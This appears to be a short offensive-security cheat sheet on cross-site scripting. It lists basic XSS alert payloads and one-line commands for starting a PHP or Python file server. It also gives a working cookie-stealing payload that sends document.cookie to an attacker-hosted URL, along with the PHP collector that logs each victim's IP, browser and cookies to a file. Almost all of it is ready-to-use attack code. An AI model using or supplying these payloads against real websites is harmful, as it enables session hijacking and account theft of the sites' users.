βοΈXSS Attacks
XSS Attacks
Only Works when website is not HTTPOnly
XSS Scripts
Basic XSS Payloads
</b><img src=x onerror=alert(document.domain)></img><b> </b><script>alert(document.domain)</script><b>
Open local File Server
Open local File server Using PHP
php -S 0.0.0.0:80
Open local File server Using PHP
python3 -m http.server 80
Get Cookies As Request
Script Used in Attacker System for hosting
/*
PAYLOAD to be used :
<script> var i = new Image(); i.src="http://<url_where_this_script_is_placed>/get-data.php?cookie="+escape(document.cookie)</script>
*/
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_Server['HTTP_USER_AGENT'];
$fp = fopen('gathered_info.txt', 'a');
fwrite($fp, $ip.' '.$browser." \\n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])." \\n\\n");
fclose($fp);
?>Strings(Cookie requests) Stored in gathered_info.txt File
Other Resources
Last updated
Was this helpful?